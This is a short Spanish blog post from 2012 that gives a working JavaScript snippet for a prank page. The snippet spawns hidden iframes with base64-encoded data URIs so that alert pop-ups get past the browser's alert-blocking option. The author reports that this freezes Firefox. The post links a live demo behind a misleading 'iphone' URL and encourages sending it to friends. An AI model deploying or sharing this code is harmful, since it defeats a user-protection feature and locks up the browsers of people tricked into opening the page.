jueves, 20 de diciembre de 2012

Enfadando a usuarios de Mozilla Firefox }xD

Bueno, hoy os dejo una entrada cortita y simple, pero es mejor que nada }:)

Hace algún tiempo quise hacer una pequeña web de broma que no te dejase salir de ella haciendo que saliesen infinitos "alerts" de javascript.. El problema es que los nuevos navegadores al aparecer el primer alert te dan la posibilidad de bloquear los siguientes.. }:(

Asique me de di cuenta de que si el alert se carga a través de un iframe y de una pagina diferente a la de los demás alert el navegador no los bloquea.. Así que con un poco de creación dinámica de webs y javascript podemos hacer lo siguiente:

Con Javascript nos hacemos un bucle infinito o finito, como cada uno quiera, y en este bucle vamos creando nuevos "iframes", y usando la creación dinámica de webs hacemos que ese iframe contenga un alert. Os dejo el código para que lo entendáis mejor:

<script>

function poc(){
    for(i=1;i<21;i++){
        var iframe = document.createElement("iframe");
        iframe.id = i;
        iframe.style.display="none";
        iframe.src = 'data:text/html;base64,PHNjcmlwdD5hbGVydCgiT2xhIGsgYXNlPyIpPC9zY3JpcHQ+';
        document.body.appendChild(iframe);
    }
}

</script>


Como podéis ver en la propiedad "src" le metemos el código para la creacion dinámica de la web en base64. El código en base64 basicamente el javascript del alert, creo recordar que era algo así:
<script> alert("Hola"); </script>

Ese es el código que contiene codificado en base64.
Bien, pues usando esto en una web, tendremos muchos iframes, hacia webs diferentes que cargan un alert, y el navegador no puede bloquear los alerts.
Y no solo no puede bloquearlos, sino que en Mozilla Firefox es el navegador el que se queda bloqueado y no responde, teniendo que reiniciar el navegador... Como veis esto último ha sido lo que quería enseñaros de verdad.. }xD

Os dejo un link para que veáis esto en funcionamiento: http://segura2010.16mb.com/iphone

Y hasta aquí la entrada de hoy, no tan dedicada a la seguridad, pero creo que es algo interesante y divertido para pasarselo a tus amigos.

No hay comentarios:

Publicar un comentario